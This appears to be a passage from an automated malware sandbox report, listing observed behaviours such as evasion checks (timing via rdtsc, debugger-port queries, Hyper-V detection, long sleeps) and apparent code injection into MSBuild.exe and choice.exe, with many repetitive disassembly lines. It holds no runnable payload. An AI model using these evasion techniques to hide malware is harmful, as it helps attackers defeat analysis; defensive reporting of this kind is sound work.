                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\choice.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\choice.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\choice.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\choice.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\choice.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Switches to a custom stack to bypass stack traces
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FFE22210774
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FFE22210154
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FFE2220D8A4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
                  Source: C:\Windows\SysWOW64\choice.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
                  Source: C:\Windows\SysWOW64\choice.exeAPI/Special instruction interceptor: Address: 7FFE22210774
                  Source: C:\Windows\SysWOW64\choice.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
                  Source: C:\Windows\SysWOW64\choice.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
                  Source: C:\Windows\SysWOW64\choice.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
                  Source: C:\Windows\SysWOW64\choice.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
                  Source: C:\Windows\SysWOW64\choice.exeAPI/Special instruction interceptor: Address: 7FFE22210154
                  Source: C:\Windows\SysWOW64\choice.exeAPI/Special instruction interceptor: Address: 7FFE2220D8A4
                  Source: C:\Windows\SysWOW64\choice.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
                  Source: C:\Windows\SysWOW64\choice.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013D096E rdtsc 9_2_013D096E
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1983Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 553Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4129Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5645Jump to behavior
                  Source: C:\Windows\SysWOW64\choice.exeWindow / User API: threadDelayed 6021Jump to behavior
                  Source: C:\Windows\SysWOW64\choice.exeWindow / User API: threadDelayed 3951Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI coverage: 0.8 %
                  Source: C:\Windows\SysWOW64\choice.exeAPI coverage: 2.2 %
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7564Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7664Thread sleep count: 4129 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7668Thread sleep count: 5645 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7696Thread sleep time: -20291418481080494s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\choice.exe TID: 8148Thread sleep count: 6021 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\choice.exe TID: 8148Thread sleep time: -12042000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\choice.exe TID: 8148Thread sleep count: 3951 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\choice.exe TID: 8148Thread sleep time: -7902000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\choice.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\choice.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\choice.exeCode function: 10_2_02B1C9D0 FindFirstFileW,FindNextFileW,FindClose,10_2_02B1C9D0
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: wscript.exe, 00000000.00000003.2389543685.000002375F147000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2389360512.000002375F128000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2398310964.000002375F14C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2389226631.000002375F123000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2398543416.0000023761264000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: choice.exe, 0000000A.00000002.2951040411.0000000002C55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll)$
                  Source: firefox.exe, 0000000B.00000002.2494060682.000001BADB9CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Program Files\Mozilla Firefox\firefox.exeAPI call chain: ExitProcess graph end nodegraph_11-5219
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Windows\SysWOW64\choice.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013D096E rdtsc 9_2_013D096E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00417B53 LdrLoadDll,9_2_00417B53
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01424144 mov eax, dword ptr fs:[00000030h]9_2_01424144
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01424144 mov eax, dword ptr fs:[00000030h]9_2_01424144
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01424144 mov ecx, dword ptr fs:[00000030h]9_2_01424144
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01424144 mov eax, dword ptr fs:[00000030h]9_2_01424144
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01424144 mov eax, dword ptr fs:[00000030h]9_2_01424144
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013C0124 mov eax, dword ptr fs:[00000030h]9_2_013C0124
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01428158 mov eax, dword ptr fs:[00000030h]9_2_01428158
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01464164 mov eax, dword ptr fs:[00000030h]9_2_01464164
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01464164 mov eax, dword ptr fs:[00000030h]9_2_01464164
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0143E10E mov eax, dword ptr fs:[00000030h]9_2_0143E10E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0143E10E mov ecx, dword ptr fs:[00000030h]9_2_0143E10E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0143E10E mov eax, dword ptr fs:[00000030h]9_2_0143E10E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0143E10E mov eax, dword ptr fs:[00000030h]9_2_0143E10E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0143E10E mov ecx, dword ptr fs:[00000030h]9_2_0143E10E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0143E10E mov eax, dword ptr fs:[00000030h]9_2_0143E10E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0143E10E mov eax, dword ptr fs:[00000030h]9_2_0143E10E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0143E10E mov ecx, dword ptr fs:[00000030h]9_2_0143E10E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0143E10E mov eax, dword ptr fs:[00000030h]9_2_0143E10E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0143E10E mov ecx, dword ptr fs:[00000030h]9_2_0143E10E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01450115 mov eax, dword ptr fs:[00000030h]9_2_01450115
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0143A118 mov ecx, dword ptr fs:[00000030h]9_2_0143A118
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0143A118 mov eax, dword ptr fs:[00000030h]9_2_0143A118
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0143A118 mov eax, dword ptr fs:[00000030h]9_2_0143A118
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0143A118 mov eax, dword ptr fs:[00000030h]9_2_0143A118
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01396154 mov eax, dword ptr fs:[00000030h]9_2_01396154
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01396154 mov eax, dword ptr fs:[00000030h]9_2_01396154
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0138C156 mov eax, dword ptr fs:[00000030h]9_2_0138C156
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_014561C3 mov eax, dword ptr fs:[00000030h]9_2_014561C3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_014561C3 mov eax, dword ptr fs:[00000030h]9_2_014561C3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0140E1D0 mov eax, dword ptr fs:[00000030h]9_2_0140E1D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0140E1D0 mov eax, dword ptr fs:[00000030h]9_2_0140E1D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0140E1D0 mov ecx, dword ptr fs:[00000030h]9_2_0140E1D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0140E1D0 mov eax, dword ptr fs:[00000030h]9_2_0140E1D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0140E1D0 mov eax, dword ptr fs:[00000030h]9_2_0140E1D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_014661E5 mov eax, dword ptr fs:[00000030h]9_2_014661E5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0138A197 mov eax, dword ptr fs:[00000030h]9_2_0138A197
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0138A197 mov eax, dword ptr fs:[00000030h]9_2_0138A197
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0138A197 mov eax, dword ptr fs:[00000030h]9_2_0138A197
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013D0185 mov eax, dword ptr fs:[00000030h]9_2_013D0185
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01434180 mov eax, dword ptr fs:[00000030h]9_2_01434180
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01434180 mov eax, dword ptr fs:[00000030h]9_2_01434180
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013C01F8 mov eax, dword ptr fs:[00000030h]9_2_013C01F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0144C188 mov eax, dword ptr fs:[00000030h]9_2_0144C188
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0144C188 mov eax, dword ptr fs:[00000030h]9_2_0144C188
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0141019F mov eax, dword ptr fs:[00000030h]9_2_0141019F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0141019F mov eax, dword ptr fs:[00000030h]9_2_0141019F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0141019F mov eax, dword ptr fs:[00000030h]9_2_0141019F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0141019F mov eax, dword ptr fs:[00000030h]9_2_0141019F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01416050 mov eax, dword ptr fs:[00000030h]9_2_01416050
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0138A020 mov eax, dword ptr fs:[00000030h]9_2_0138A020
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0138C020 mov eax, dword ptr fs:[00000030h]9_2_0138C020
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013AE016 mov eax, dword ptr fs:[00000030h]9_2_013AE016
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013AE016 mov eax, dword ptr fs:[00000030h]9_2_013AE016
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013AE016 mov eax, dword ptr fs:[00000030h]9_2_013AE016
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013AE016 mov eax, dword ptr fs:[00000030h]9_2_013AE016
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01414000 mov ecx, dword ptr fs:[00000030h]9_2_01414000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01432000 mov eax, dword ptr fs:[00000030h]9_2_01432000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01432000 mov eax, dword ptr fs:[00000030h]9_2_01432000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01432000 mov eax, dword ptr fs:[00000030h]9_2_01432000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01432000 mov eax, dword ptr fs:[00000030h]9_2_01432000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01432000 mov eax, dword ptr fs:[00000030h]9_2_01432000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01432000 mov eax, dword ptr fs:[00000030h]9_2_01432000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01432000 mov eax, dword ptr fs:[00000030h]9_2_01432000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01432000 mov eax, dword ptr fs:[00000030h]9_2_01432000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013BC073 mov eax, dword ptr fs:[00000030h]9_2_013BC073
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01392050 mov eax, dword ptr fs:[00000030h]9_2_01392050
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_01426030 mov eax, dword ptr fs:[00000030h]9_2_01426030
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013880A0 mov eax, dword ptr fs:[00000030h]9_2_013880A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_014120DE mov eax, dword ptr fs:[00000030h]9_2_014120DE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_014160E0 mov eax, dword ptr fs:[00000030h]9_2_014160E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0139208A mov eax, dword ptr fs:[00000030h]9_2_0139208A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0138C0F0 mov eax, dword ptr fs:[00000030h]9_2_0138C0F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013D20F0 mov ecx, dword ptr fs:[00000030h]9_2_013D20F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_013980E9 mov eax, dword ptr fs:[00000030h]9_2_013980E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0138A0E3 mov ecx, dword ptr fs:[00000030h]9_2_0138A0E3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_014280A8 mov eax, dword ptr fs:[00000030h]9_2_014280A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_014560B8 mov eax, dword ptr fs:[00000030h]9_2_014560B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_014560B8 mov ecx, dword ptr fs:[00000030h]9_2_014560B8
